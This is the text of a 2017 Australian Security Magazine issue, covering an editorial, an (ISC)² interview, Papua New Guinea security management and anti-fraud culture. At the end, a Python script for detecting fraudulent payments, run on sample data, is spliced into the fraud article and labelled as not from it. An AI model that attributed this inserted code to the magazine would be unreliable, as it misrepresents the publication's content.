THE COUNTRY’S LEADING GOVERNMENT AND CORPORATE SECURITY MAGAZINE | www.australiansecuritymagazine.com.au Feb/March 2017
Vehicle attacks: Ten minute traffic deployment
Australia just can’t hack it
The Chinese NY Bank Cyber Heist
Practical steps for building a cyber resilient enterprise
What it takes to be a smart city
SPECIAL REVIEW Canalys Channels Forum - Macau
Is privacy a lost cause
The role of cyber insurance
TechTime, Quick Q&A, Book reviews, Cyber Security and much more...
Contents

Editor's Desk
Quick Q&A with David Shearer
International: Operational security management structures
Corporate Security: Anti fraud and corruption
Cultivating vigilant behaviour in people
Frontline: Ten minute traffic security deployment
Smart City Series: What it takes to be a 'smart city'
CCTV Feature Series: About pixel densities
Russia's Cyber War: Options before the US
Are you ready for your next data breach?
The Chinese New Year heist
Australia just can't hack it
Editor's interview: Big data and analytics expert
There is no such thing as a 'safe site'
Women in Security Series: Rachel Falk
Practical steps for building a cyber-resilient enterprise
Is privacy a lost cause?
Information and the role of cyber insurance
Canalys Feature Review
TechTime - the latest news and products
Editor's book review

Executive Editor / Director: Chris Cubbage
Director / Co-founder: David Matrai
Art Director: Stefan Babij
Correspondents: Tony Campbell, Sarosh Bana
Marketing and Advertising: T | +61 8 6361 1786

Copyright © 2015 - My Security Media Pty Ltd, 286 Alexander Drive, Dianella, WA 6059, Australia. T | +61 8 6465 4732. All material appearing in Australian Security Magazine is copyright. Reproduction in whole or part is not permitted without permission in writing from the publisher. The views of contributors are not necessarily those of the publisher. Professional advice should be sought before applying the information to particular circumstances.
Correspondents* & Contributors
Dr Bill Bailey Louis Yau Greg Hamm Vlado Damjanovski Boaz Fischer Ryan Linn
Editor's Desk

“There is a major war brewing, a war that’s already global. Every day that we refuse to look at this as what it is — and the scale of it, and really the viciousness of it — will be a day where you will rue that we didn’t act” - Stephen K. Bannon, 2014, discussing the Islamic State Caliphate. Bannon is now the White House Chief Strategist to US President Donald Trump.
Having an understanding of ‘security’, as both an applied science and an outcome, conjures up an appreciation of human weakness and technical vulnerabilities. Security is also as much a human feeling as are love and fear. Indeed, feelings of security often sit alongside both, but alongside fear it can be politicised and manipulated, potentially becoming very dangerous. As Prince Charles said recently, “the horrific lessons of the last War seem to be in increasing danger of being forgotten.” Fear is why the public reacts strongly with reassurance to political statements of security around the ‘threat of terrorism’, yet ignores the scores of daily murders and shootings caused as a result of domestic violence and organised crime. Or why US President Donald Trump would prefer to cause worldwide disruption by banning ‘terrorist’ countries, despite reports that none of the seven listed countries have been a direct source of any terrorists, and the ones that do show up repeatedly as a source — especially Pakistan, Saudi Arabia, and Egypt — aren’t on the list. The order on ‘protecting’ Americans from terror attacks also ignores the thousands killed by American guns – over 15,000 gun-related deaths in 2016. Yet, it is the very same reason why the NSW Government creates a position for a new Minister for Counter Terrorism, a week following a public admission from the NSW Crime Commission that they have ‘lost the war on drugs.’ As I wrote in my last editorial of 2016, the trends of last year were surely enough to indicate that 2017 is going to be a fascinating year in a security context. The impact of the new US President Donald Trump has been immediate and intense. China is clearly making it known that it will not budge if pushed or tested on the militarisation of the South China Sea – they now have air, land and maritime control of their claimed sovereign territory.
Sanctions and military rhetoric have also intensified with Iran, and the conflict in Ukraine continues, testing NATO’s patience and the relationship between the US and the European Council. Much of this is unprecedented and unpredictable – to say the least! Prepare for continued fundamental shifts in world affairs, prepare for expanding military conflict and prepare for these events to have a major impact on Australia and across the Asia Pacific. In this issue, we cover the Russian Hack, which is confirmed to have been designed to manipulate the federal election of the world’s most dominant democracy and could well be the defining element in modern human history if Trump continues unabated. Also, as highlighted in our interview with David Shearer, CEO of (ISC)², “cybersecurity has been increasingly regarded as a strategic international issue affecting all levels of society.” Ryan Linn, Director of Advanced Threats and Countermeasures at Nuix, writes, “cybersecurity is just now becoming a talking point in Australia. For various reasons, I don’t think Australia is quite there yet.” This should be concerning. Nation states and sponsored operatives will use cyber espionage more and more to cause political shifts, disruption, and to gain economic advantage. The inherent weaknesses of email mean it is critical that organisations take proactive measures to secure themselves, from simple phishing emails right through to impersonation and weaponised attachments. Malware can be easily bought online, meaning that criminals with little to no computer skills are free to send infected emails. It is also vital that organisations look to train employees to be and remain alert as the gatekeepers into an organisation. This extends to the CEO, CFO and Board Chair. It is the top-down approach most needed.
It is also incumbent on all security professionals, be they in the physical or cyber domain, to come together and multi-skill – this requires the state regulators to recognise it is 2017 and a new world. The continued disparity in security industry state regulation, and the federal legislation on mandatory data breach disclosure that is yet to pass, are both signals that Australia remains a long way behind and at risk of succumbing to cyber warfare, espionage and cybercrime adversaries, as well as planned and opportunistic terror attacks. But worse is the continued horror of domestic violence killings and drug wars lost across the country, with no political will, or even a capacity, to deal with it. To demonstrate our commitment to the security domain and the urgently needed focus on cybersecurity, MySecurity Media is launching the Australian Cyber Security Magazine in 2017 – this will be published alongside our existing channels. This edition remains strongly influenced by the cybersecurity threat, but we also cover vehicle borne terror attacks, city wide technologies, and my book review of Bruce Schneier’s book, Data and Goliath, which questions the mass surveillance approach, particularly in light of my review of the Canalys Channels Partner ‘Digital First’ Forum in Macau, which highlights the European Union General Data Protection Regulation (GDPR) entering into application in 2018. The wider implications of the GDPR are focused on data privacy controls without country or regional boundaries. This reflects the nature of data flows, new technologies and the creative and disruptive business models emerging in new digital economies. How Australia and the APAC region fare in 2017 politically, economically and technologically is yet to be seen, but we’re surely in for an interesting and challenging ride. I doubt we’re sufficiently prepared or have ready the needed public mindset which resists fear and remains security aware. And on that note, as always, we provide plenty of thought provoking material and there is so much more to touch on. Stay tuned with us as we continue to explore, educate, entertain and most importantly, engage.

Yours sincerely,
Chris Cubbage CPP, RSecP, GAICD
Executive Editor
Quick Q&A with David Shearer

CEO of international cybersecurity certification organisation, (ISC)².

ASM: It’s been an interesting year in terms of cybersecurity - what have been the highlights for (ISC)²?

David Shearer (DS): It’s also been an interesting year for (ISC)². In 2016, cybersecurity has been increasingly regarded as a strategic international issue affecting all levels of society. By the year 2020, the number of networked devices (the internet of things) will outnumber people by six to one, transforming current conceptions of the internet. (Source: UN, Comprehensive study on cybercrime, UNODC, Vienna, 2013.) As mobile data usage and traffic has been increasing rapidly and substantially, faster than prevention technology - cybersecurity measures and policies - countries worldwide are at a higher risk of facing information security challenges more than ever before. Talent capacity building has been one of the most discussed topics in the global arena. No matter where I travelled this year—the Americas, Europe, Asia—I heard the term ‘talent capacity building’ in almost all discussion forums. (ISC)² members remain at the forefront of cybersecurity, and since 2004, our Global Information Security Workforce Study continues to validate this significant talent shortage. Our members are overworked based on the limited number of qualified people in the workforce and consequently, many are falling behind in their duties. This is compounded by the lack of new people entering the profession. In addition, our members are increasingly involved in a range of audits that consume significant amounts of time, at the expense of operational cybersecurity requirements and responsibilities. In 2016, we have tried to address the workforce shortage by speaking with various government agencies about how (ISC)² can collaborate with them to enhance the quality of the cybersecurity workforce and increase the numbers in the professional pipeline.
Our recent signing of a memorandum of understanding (MOU) with the Cyber Security Agency of Singapore (CSA) is one of those moves. The MOU allows CSA and (ISC)² to increase public cybersecurity awareness, and complement existing efforts in the development and maintenance of the cybersecurity competency framework in Singapore. At the same time, we asked our global regional offices to expand our International Academic Program (IAP) to a network of university partners, to provide them with access to the professional knowledge maintained by (ISC)²’s Common Body of Knowledge (CBK®) so that their graduates will be equipped with much-needed cybersecurity skills. We also advise the course designers and course accreditors to help them embed cybersecurity into degree modules and associated syllabi.

The Associate of (ISC)² program has been instrumental in helping over 15,000 people become full members since 2009. Our associate program provides a career path for individuals that do not have the requisite experience requirements, but are able to pass one of our rigorous exams. For example, the CISSP requires 5 years of experience, but an Associate of (ISC)² has six years to get the required experience. By using the (ISC)² digital badge, our Associates can validate that they passed our exam, and are progressing toward certification. Employers can look to Associates of (ISC)² as a way of building talent capacity by giving our Associates a chance to get the required experience while growing with their organizations.

At (ISC)² we believe that when it comes to cybersecurity, we need to look after the most vulnerable members of society - children and seniors – and do everything we can to ensure their safety. We’re trying to reach young hearts and minds through our Safe and Secure Online program, and we have engaged Garfield as our ‘spokes-cat’ to leverage the awareness programs to show young children that cybersecurity is an exciting field. Garfield and Friends brings international recognition to (ISC)²’s program for cyber security education for children. www.safeandsecureonline.org

ASM: How have the new services that have come online this year been received by your members?

DS: In 2016 we focused on increasing member benefits, including forming strategic partnerships with industry to help position our members for success. We recognize that many of our members struggle to have the right level of staff, and they seldom have all the tools they need, like Security Information and Event Management (SIEM) technologies. Some of our members tell us they spend more time chasing vulnerability information and normalizing all the data, instead of actually patching and remediating vulnerabilities. For these members, we teamed up with Cytenna to bring Vulnerability Central to our members at no cost. Vulnerability Central empowers members to spend less time researching and normalizing vulnerability data and more time on targeted vulnerability remediation. In addition, we partnered with the Institute for Applied Network Security (IANS), providing members access to their CISO Impact Diagnostics. We have a partnership with UCF and their Common Controls Hub, which helps our members make sense of more than 90,000 individual mandates from 800-plus laws and standards around the globe. We also are trying to help our members have more business-based discussion about the value of cyber, information, software and infrastructure security through partnerships with PivotPoint and their CyVar product that focuses on cyber risk valuation. We also have a partnership with RiskLens for discounted FAIR training and discounts on their tools that are based on the open FAIR standard. We want the customer experience from candidate to member to be outstanding and continually improving. An endorsement process that is too convoluted and takes too long to complete does not provide a candidate on the path to membership with a great experience. We have just deployed a new online endorsement process that has cut the processing time by 49%, and we’re going to continue to look at other ways to improve our business processes to the betterment of our members. Earlier this year we issued digital badges to our members. Digital badges make it convenient for employers and recruiters to validate the status of our members. It also helps members promote their competencies and capabilities to current and potential employers.

ASM: The cyber security skills gap seems to be in the news every week. What measures need to be taken in government and industry to address this?

DS: At (ISC)² our position has always been that cybersecurity is a global problem that requires a global response. Governments can absolutely play a key role in cybersecurity initiatives, such as security intelligence sharing and technology innovation transfers to the private sector. Governments have the ability to become security innovation centres and help move industry to new levels, but their role in their own intelligence-gathering efforts holds back the good they can do for their citizens. Legislative branches also wield the power to compel organizations to meet standards and set mandates for incident response and consumer protections.
While indirectly affecting security, these actions help organizations quantify and address security risks lest they incur direct government intervention. From a talent perspective, governments are struggling more than most because private industry is recruiting heavily and poaching government security staff faster than they can be replaced. Thus, governments have a large stake in developing methods to expand pipelines for security talent through academic partnerships and public-private ventures.

ASM: In some countries around the world, the idea of establishing information security as a regulated and governed profession has been mooted; what’s going on in the US and what are the views of (ISC)²?

DS: While cybersecurity is an international issue affecting all levels of society, we do not see a move towards licensure in the United States. However, we see there is a trend for compilation of a national competency framework and organizations are mapping towards that framework. For example, the DoD 8570 directive is mapped against the National Cybersecurity Workforce Framework (aka the NICE Framework) by NIST. In the U.S., the Department of Defense (DoD) 8570 directive was published in 2005 to address the concern of unqualified personnel performing very critical cyber functions. The DoD 8570 directive requires its information assurance (IA) workers to obtain a commercial certification that has been accredited by ANSI or an equivalent authorized body under the global ISO/IEC 17024 standard. This DoD-wide policy was made official in August 2004 and approved for implementation in December 2005. ISO/IEC 17024 establishes a global benchmark for the certification of personnel. (ISC)² was the first organization within the information technology sector to earn ISO/IEC 17024 accreditation for personnel certification for the CISSP. Now the SSCP, CAP, CSSLP, CISSP-ISSAP, ISSEP and ISSMP certifications have also been approved to the ISO/IEC 17024 standard. In Asia, the National Infocomm Competency Framework (NICF), developed by IMDA and SkillsFuture in Singapore in close collaboration with the infocomm industry, is a national infocomm roadmap that articulates the competency requirements of key infocomm professionals. Infocomm professionals and employers can leverage the NICF to determine the types of skills and competencies required for various infocomm jobs and to develop training strategies for the professionals to acquire these skills through accredited training providers. The NICF is an open system which allows international certifications and which also promotes knowledge exchange. CISSP, CSSLP and CCSP mapping to NICF has been approved.
Over the years we have witnessed many efforts by governments to create local standards or certifications for security professionals. We have advocated against this because while there may be good intentions, carrying the burden of maintaining these types of programs can be a drag on the government and programs can quickly become out-of-date or take a myopic approach to be valuable. (ISC)² spends a great deal of time and energy maintaining the body of knowledge on which our certifications are based, and we maintain an international cadre of experts to help keep them up-to-date. The body of knowledge we create transcends borders and is a great place to build from when it is applied to our certifications or even academic security curriculum.
ASM: Looking forward, what are your tactical and strategic aims for the next 12 months and the next 3 years?

DS: (ISC)² has begun a modernization initiative called the Digital End-to-End (DETE) program. In the next 12 months, the DETE program will be transforming the way (ISC)² does business. DETE will provide (ISC)² a single pane of glass and cross-functional business information to leverage analytics for comprehensive customer insights to provide more meaningful experiences and uncover new opportunities. I don’t want to give too much away about the program, as we will be announcing it next year. Over the course of the next three years, you will see marked changes in (ISC)² as our DETE Program provides the business enablement we’ve needed to better serve our members and the profession. This will be in the form of better CPE opportunities, with immersion training focused on specific topics critical to keeping our members at the top of their game. (ISC)² will be better able to leverage one of our most valuable assets, the brain trust of our membership, that’s constantly gaining more experience and innovating solutions to handle the seemingly ever-expanding threat landscape. As our membership continues to grow, (ISC)² needs to find new ways to deliver value to our members. We’ll continue to explore business partnerships that can help advance the profession and best serve our hardworking members.

ASM: If you had one minute to tell kids about the information security industry as a career option, what would you say?

DS: I want to encourage more young people, especially young women, to join our profession. Women are fantastic performers in this profession. I have seen it first-hand. The industry needs young people from both genders and from all walks of life, races and backgrounds. Problems are best solved with diverse teams. Cybersecurity is going to continue to grow in importance.
Books like Ted Koppel’s “Lights Out” that highlight the risks related to major cyberattacks will continue to raise awareness. Let’s just hope the global cybersecurity workforce can thwart such an attack. We need bright minds to join the team of good guys and gals trying to counter the growing number of bad actors.
Operational security management structure for inimical environments

By Dr. Bill Bailey
Papua New Guinea (PNG) is an enigma for most companies wishing to set up and function safely and securely in the country. Anecdotal evidence is rife, as are the newspaper reports, on all aspects of the impact of crime in PNG. Reports related to urban crime point to the underlying reasons, including high levels of poverty, inadequate healthcare and education, and a lack of basic infrastructure. The primary factor is considered to be the failure of law and order to bring civil stability, followed by high levels of corruption. The major urban centres of Port Moresby and Lae are considered the most problematic. The ability to develop an operational security management plan is dependent on accurately assessing the actual threat, risks and capability of adversaries to impact on the working environment. Extensive background information needs to be obtained from a number of sources in order to produce a Security Risk and Threat Assessment (SRVTA) (W J. Bailey & Doleman, 2013, p. 57). To be effective in this task requires an understanding of how grave the problem is, and in which specific areas, before any meaningful action can be taken. PNG is not unique, as crime is insidious in most developing countries and its impacts affect all sections of society. Therefore, undertaking a comprehensive security, risk and threat assessment is necessary to fully understand the nature and scope of the problem first. A Security Risk Assessment requires an all-inclusive understanding of the social, economic and political factors before successful and meaningful security management programmes can be implemented or even suggested. Based upon these criteria, this paper assesses how this indispensable security management process can be accomplished given the far-reaching restraints that are present in undertaking any such process in PNG. The recent trend from incident reports, newspaper articles and anecdotal evidence indicates a steadily rising level of crime in PNG.
Changes in socio-economic expectations and the high price of goods have all contributed to increasing social strains. The completion of the PNG-LNG pipeline has seen a decrease in employment that is believed to be associated with increasing levels of crime. This trend in crime is present in both urban and rural areas. Without a major investment in infrastructure by the Government to create more employment, or another major oil and gas project, which seems less likely at current prices, social unrest will grow, as will crime.
Risk Situation

Port Moresby was ranked as one of the world’s least liveable cities, scoring 138 out of 140 on the list prepared by the Economist (Economist Intelligence Unit, 2016). However, sometimes there is no choice for those who need to live here for work purposes, which is why it is included in the Economist list. Figure 1 indicates that even though the security risk is at 61D, it is not the most severe, indicating that it can be managed with sufficient safeguards. Perhaps what is more concerning is the EIU’s rating for Government effectiveness at 68D and Infrastructure, which has fallen from 78D in 2015 to 81E. Both of these high scores show increased concern from analysts regarding the situation in PNG.

Creating an operational security management structure

It is commonly accepted that operating in PNG presents challenges to companies, but these are not insurmountable when compared to operations in Iraq, Algeria, or other conflict zones. PNG is not a conflict zone, nor does it have a terrorist or civil war problem. The problems are predominately crime related, based upon social inequality and aggressive cultural behaviour. These problems can be managed with sufficient safeguards integrated into the security management structure. However, first there always needs to be a structured, comprehensive risk, threat, vulnerability and criticality assessment conducted in order to develop the necessary safeguards. Understanding what is meant by risk and how to define it is crucial to the process. AS/NZS 31000:2009 considers it to be the “effect of uncertainty on objectives…[when] an effect is a deviation from the expected - positive and/or negative” (Standards Australia, 2009). Kaplan (1981) states “we are not able in life to avoid risk but only to choose between risks”, and in order to accomplish this we need to quantify risk by using what Kaplan defines as a set of risk triplets: scenario, probability, and consequences.
• What could happen, when and how? (i.e. What can go wrong?)
• How likely is it that it will happen? (i.e. likelihood)
• If it does happen, what are the consequences?
The risk scenarios and ratings from EIU are given in Figure 1.

Figure 1 Risk Scenarios and rankings (Economist Intelligence Unit, 2016)

When analysing this approach, the important concept to bear in mind is the relationship consequence has in the whole assessment process. Ezell (2007) argues this further where, “vulnerability highlights the notion of susceptibility to a scenario, whereas risk focuses on the severity of consequences within the context of a scenario”, proposing a series of definitions to accommodate this concept. It is important to understand that “vulnerability assessments are not the same as risk assessments”, because “risk assessments are employed to help understand what can go wrong, estimate the likelihood and the consequences, and to develop risk mitigation strategies to counter risk.” (Ezell, Farr, & Wiese, 2000). Consequences are therefore the prime concern for dealing with threats and hazards in relation to the potential damage caused and how difficult it might be to put right. A security vulnerability assessment is far more comprehensive than many managers appreciate. Therefore, in order to understand the prevailing risk environment, a three-staged approach to a security review should be used:

1. Resource appreciation to identify those assets requiring protection, such as people, property and/or information, as well as criticality analysis in terms of the specific processes, systems and/or activities being undertaken.
2. Threat assessment to determine potential threats, including motivation and capability, which may include:
a) Criminal (theft, robbery, assault, vandalism, kidnapping, murder, fraud, etc);
b) Targeted (sabotage, hijacking, assassination, kidnapping, armed incursion, etc);
c) Operating environment including local flash points, landowner disputes or grievances;
d) Inadequacy of essential services or infrastructure, including police support;
e) Natural event (fire, earthquake, flood, storm etc).
3. Vulnerability assessment to determine the extent and appropriateness of loss prevention and protection measures currently being considered or in place.

Only by taking this more holistic approach can all the risk scenarios be captured and thus dealt with effectively. The starting point is the creation of a country security assessment, which is a report to provide a working baseline. This report will include the operating environment, geography, the people, social and economic conditions, government and infrastructure, security, risk, threat and vulnerability assessment. The environment includes access conditions, the roads, water, power, medical facilities, local tribes, community harmony, key figures, in fact anything that can impact on the project and its personnel. There are a number of considerations that can impact on the assessment process (Figure 2) and these will drive the next phase. A single event may have multiple ripple consequences causing a series of knock-on effects. Each of these effects needs to be fully deliberated and understood, and mitigation measures built into not only the Security Management Plan, but also the Business Continuity Plan.

Figure 2 Risk Ripple Considerations (W J. Bailey, 2015)

The ‘Consequence’ should be assessed based upon the criteria above and the:
• Comprehensive understanding of current and proposed operations and activities;
• Consideration and prioritisation of the most likely worst-case events/consequences affecting the facility, operations, staff, contractors, visitors and the surrounding community;
• Characterization of how malevolent acts might occur and assessment of the prevalence of such malevolent acts from defined threat sources, such as criminal, insider, determined vandal, casual vandal and terrorist;
• Determination of the most critical assets (targets); identification of their inter-relationships with other assets in the system; identification of the consequences of malevolent acts that could be directed against those assets; and evaluation of the effectiveness of both existing and proposed protection systems;
• An appreciation of the limitations of the supply-chain impact, that is the amount of time needed to replace the damaged assets and the likely cost to the operation.

Consequences become the determining factor and are therefore extremely pertinent to the structure employed to manage the security and the safety of the project. Failure to fully address potential negative outcomes could possibly seriously prejudice the project, or worse!
Proposed Model A security management model for hostile environments was identified in (W.J. Bailey, 2014) as the ‘Aid and Humanitarian agencies security triangle’ (Figure 3) based upon: acceptance, deterrence and protection. Acceptance being foremost, “to remove or reduce the threat by seeking widespread acceptance for one’s presence and work among the populations and from the official and de facto authorities”. Consequently, the company needs to gain wide approval from the local community imbuing them a vested interest in the project. Only by achieving this objective, can the other two pillars of the triangle function (Humanitarian Policy Group, 2010). The proposed model (Figure 4) has been adapted and incorporates an additional arm, ‘Intelligence’, which is deemed essential to developing a robust and successful security management structure. The Inimical Model (Figure 4), also moves protection more forcefully into structured Security Management System (SMS). Integral to SMS is a comprehensive security, risk and threat assessment in order to create the necessary systems based upon documentation, such as a Security Management Plan (SMP and Standard Operating Procedures (SOPs). Furthermore, there is a need to accept that ‘deterrence’ can only be achieved by incorporating a designed security process aided by community support: accomplished by an integrated intelligence network. Intelligence adopts a much wider meaning in this context, as it must be integrated to allow for a free flow of informed information, which is capable of picking up early warning signals should threats arise for any reason. Only by working directly with the community and supporting local initiatives will this have any chance of success. 
In addition, ‘by design’, stemming from the ‘deterrence’ segment, not only means engineered to incorporate access control, detection and technical solutions, but also ensuring the security personnel employed are ‘fit for purpose’ through dedicated professional training. Furthermore, more local senior security management staff need to be employed, and they need to gain tertiary degree qualifications to allow them to supervise, develop and administer the security workforce. The benefit of using local staff at senior management levels is their ability to empathise, communicate and understand complex local issues. In order to achieve these goals, more training, mentoring and local recruitment needs to take place.
Figure 3 Adapted from the Aid Agencies Security Triangle (Martin, 1999, p. 4)
Conclusion
To operate safely and securely in PNG requires a steadfast approach to ensure a comprehensive security management approach is put into place. Incorporating a more inclusive structure by engaging the local community more formally is seen as a more progressive and sustainable long-term model. To strengthen and underpin this approach, it is necessary to utilise more local PNG citizen managers. Accomplishing this objective requires employing and empowering more talented citizens for senior management roles. However, with the limited educational opportunities available for tertiary qualifications in security management in PNG, this will also require the Security Industries Authority (SIA) and the government to support the creation of tertiary degrees at universities in PNG.
Figure 4 Proposed Inimical Security Model (W J. Bailey, 2015). Arms of the model: based upon community support; by design & community support; structured security management; integrated local network.
The model proposed in Figure 4 requires a substantial mindset change, as it has to be developed with the acceptance of the community. Most large companies in PNG already have a Community Affairs (CA) section, which deals with all aspects associated with the impacts projects have on local communities and ensures structures for contract negotiation and dispute resolution. Security needs to be aligned more formally and closely with CA, sharing intelligence, networks and resources. PNG is changing and acceptance of predominantly expatriate personnel is meeting with more local resistance: it is no longer socially acceptable, nor is it operationally sustainable or cost effective. The problems associated with this framework are obvious; consequently there needs to be a change in approach to one that recruits and trains security staff locally. There are a number of advantages and multiple benefits that can be harnessed by employing local people from the community. The difficulties of operating in potentially hostile environments such as PNG require a more integrated security management structure, based upon greater local acceptance by the community coupled with more social engagement, leading to better intelligence. The role of security is evolving, requiring more inclusive structures capable of ensuring the safety and security of all personnel. The purely defensive model is no longer appropriate and needs to be tempered with the additions outlined in this article.
Anti fraud and corruption: More of cultivating a culture than prevention & control
By Prince Lazar, Malaysia Country Editor
In today’s world, fraud is a serious problem for all organisations to come to grips with, given that regardless of the line of business, employees (and non-employees too) commit fraud. Technology changes that occur so rapidly have had a cascading effect, forcing organisations to adapt to the dynamism of this fast-paced world. This constant change, whilst good for business in many ways, has also precipitated a steep rise in fraudulent activity, which continues to evolve and requires individuals and businesses to be more prudent in their practices and corporate culture. Fraud can happen anywhere and occurs every day all over the world. While major fraud cases are typically the ones that attract wide media attention, the huge sums of money lost by all types of businesses as a result of the high number of smaller frauds are disastrous in many ways. Fraud generally does not occur in a vacuum or in isolation; many times it happens within an environment that, while maybe not overtly, is itself a breeding ground facilitating fraudulent activities. Most frauds are an ongoing work; once it starts it does not stop by itself, and as it continues, it grows until it gets detected. Fraud is widely prevalent and, more interestingly, it is nearly impossible to identify a potential fraudster with any degree of confidence. The overwhelming majority of people who commit fraud are first-time offenders. It is reported that only 5 percent of fraudsters caught have had a prior fraud conviction. Therefore, no matter how diligently a background check is conducted, the likelihood that it will unmask a person who eventually will steal from the business remains limited. Today, in an increasingly interconnected world, digital technologies that enable business to be conducted in the wink of an eye also help disguise the identities and machinations of the people conducting that business, thereby enabling fraud to become vastly more sophisticated and pervasive. Likewise, fraud’s impact on businesses, stakeholders and entire economies has magnified in a profound manner, which is a great area of concern. A shaky economy is rife with fraudulent activity, which could range from internal fraud such as employee abuse of purchasing cards to large-scale fraud involving high-value contracts and breaches of controls that could have serious consequences to businesses. This is precisely the time to step up fraud prevention and detection measures in organisations and entities which support the economy. Some companies/organisations are in a self-insulated mode, believing “nothing could go wrong” or taking an “it won’t happen to us” approach; others implement controls to try to keep individuals likely to commit fraud from entering the business; and still others outsource the work of combating fraud to external auditors. These tactics and strategies are helpful but limited. There is a greater need for companies to create lower-risk environments for fraud by implementing an effective, conducive corporate culture. To do so, organisations first must understand their own corporate ecology (the interrelations between people and their workplace) and tailor controls to the nature of those systems. In some cases, companies have incentivised winning and maintaining business to the extent that they closed their eyes to law breaking, nurturing an environment in which corruption could flourish. In fact, it is the environment or culture in which company employees operate that leads them to feel they were not acting abnormally but rather in the best interests of the business while protecting their colleagues’ jobs. A prevalent ‘lax culture’ could extend further to improve the revenue figures, thereby boosting the appearance of profitability, and beyond this there could be pressure to conceal inventory shrinkage losses, which is a fraudulent trend. The evolution of this practice has been blamed on the low staffing levels maintained by the organisation, making accurate inventory management difficult.
“The roots of a fraud rarely can be traced to a single unethical individual operating maliciously in a vacuum. A fraud is perpetrated when that person meets a specific environment.”
This establishes an environment of scarcity in which deceptive inventory processes are, at best, ignored by managers and, at worst, applauded, thereby discouraging those in charge from coming forward. In essence, the corporate ecology or culture would normalise the financial statement fraud, creating fraudsters where, in a different environment, this might not have happened, or might have been detected rather than approved.
Internal controls
Most organisations will contend that there are sufficient internal controls in place to deter, or even eliminate, fraudulent actions. But the fact is that internal controls do not entirely prevent fraud. Also, internal controls need to be reviewed, because existing controls may no longer be as effective as when they were developed. Businesses change, and as they do, more and different employees are hired, which brings dynamic new changes to the organisational environment.
It is proven that internal controls generally have weaknesses that can be exploited. There is a need to look at one hundred per cent of the transactions, compare data from different applications and systems, and look for matches that occur that really shouldn’t be there, or for duplicate entries in the transactions that indicate either fraudulent activity or perhaps inefficiencies in the system. This has to be done regularly, using automation in high-risk areas so the fraud can be detected as it occurs and before it escalates. Of course, uncovering fraudulent activity that has been going on for several years is clearly an important win, but finding the issue before it becomes material is going to serve the organisation better in the long run. The implementation of internal controls is more effective, and obviously more proactive, than external ex post facto audits. These controls should include management reviews, real-time data analysis of transactions (or as close to real time as possible), robust whistle-blower programs, rigorous client and partner vetting, and a wide range of soft compliance strategies, including tipster hotlines, qualitative interviews with employees and a process for continually collecting employee feedback. Not only do these strategies help companies keep their finger on the pulse of the organisation, anti-fraud policies also help deter potential fraudsters who would take advantage of a company’s lack of such oversight.
Bribery & Corruption take centre stage
Managing bribery and corruption risk is taking centre stage in corporate boardrooms and becoming one of the most critical compliance challenges for employers. A corruption scandal can destroy an organisation’s reputation and result in significant fines, penalties, and even imprisonment.
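The full-population, cross-system matching the paragraph describes, as an added example that is not from the article: it runs duplicate-payment checks and "matches that shouldn't be there" (a vendor bank account that also appears in payroll, a paid vendor missing from the vendor master) over constructed accounts-payable records. The record layout, field names and the seven-day near-duplicate window are assumptions.

```python
"""Continuous-monitoring checks over accounts-payable data.

Added example, not from the article. All records below are constructed
sample data; field names and thresholds are assumptions.
"""
from collections import defaultdict
from dataclasses import dataclass
from datetime import date, timedelta
from itertools import combinations


@dataclass(frozen=True)
class Payment:
    pay_id: str
    vendor_id: str
    invoice_no: str
    amount: float
    paid_on: date
    bank_account: str  # account the funds were sent to


# Constructed sample data: one AP payment run, the vendor master and the
# payroll master, standing in for three separate systems.
PAYMENTS = [
    Payment("P1", "V100", "INV-2001", 12500.00, date(2017, 1, 9), "AU-11-0001"),
    Payment("P2", "V100", "INV-2001", 12500.00, date(2017, 1, 23), "AU-11-0001"),  # exact duplicate
    Payment("P3", "V200", "INV-77", 4990.00, date(2017, 1, 12), "AU-22-0002"),
    Payment("P4", "V200", "INV-77A", 4990.00, date(2017, 1, 14), "AU-22-0002"),  # near duplicate
    Payment("P5", "V300", "INV-5", 880.00, date(2017, 1, 15), "AU-33-0003"),
    Payment("P6", "V999", "INV-1", 2300.00, date(2017, 1, 16), "AU-44-0004"),  # vendor not in master
]
VENDORS = {"V100": "AU-11-0001", "V200": "AU-22-0002", "V300": "AU-33-0003"}
EMPLOYEES = {"E42": "AU-33-0003"}  # same account as vendor V300


def exact_duplicates(payments):
    """Same vendor and invoice number paid more than once."""
    seen = defaultdict(list)
    for p in payments:
        seen[(p.vendor_id, p.invoice_no.strip().upper())].append(p.pay_id)
    return [ids for ids in seen.values() if len(ids) > 1]


def near_duplicates(payments, window_days=7):
    """Same vendor and amount within a short window with differing invoice
    numbers: the way a second payment slips past an exact-match control."""
    by_vendor = defaultdict(list)
    for p in payments:
        by_vendor[p.vendor_id].append(p)
    hits = []
    for group in by_vendor.values():
        ordered = sorted(group, key=lambda p: p.paid_on)
        for a, b in combinations(ordered, 2):
            if (a.amount == b.amount and a.invoice_no != b.invoice_no
                    and b.paid_on - a.paid_on <= timedelta(days=window_days)):
                hits.append((a.pay_id, b.pay_id))
    return hits


def vendor_employee_account_matches(vendors, employees):
    """Vendor bank accounts that also appear in payroll: a match across
    systems that should not exist and warrants review."""
    by_account = defaultdict(list)
    for emp, acct in employees.items():
        by_account[acct].append(emp)
    return [(v, acct, by_account[acct]) for v, acct in vendors.items()
            if acct in by_account]


def unregistered_vendors(payments, vendors):
    """Payments to vendor ids absent from the vendor master (possible ghost vendor)."""
    return sorted({p.vendor_id for p in payments if p.vendor_id not in vendors})


def run_checks(payments=PAYMENTS, vendors=VENDORS, employees=EMPLOYEES):
    """Run every check over the full population; returns findings for review."""
    return {
        "exact_duplicates": exact_duplicates(payments),
        "near_duplicates": near_duplicates(payments),
        "vendor_employee_accounts": vendor_employee_account_matches(vendors, employees),
        "unregistered_vendors": unregistered_vendors(payments, vendors),
    }


if __name__ == "__main__":
    for check, findings in run_checks().items():
        print(f"{check}: {findings}")
```

Scheduled against each payment run, the same functions give the regular, automated review of high-risk areas the paragraph calls for; each finding is a lead for a reviewer, not proof of fraud.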
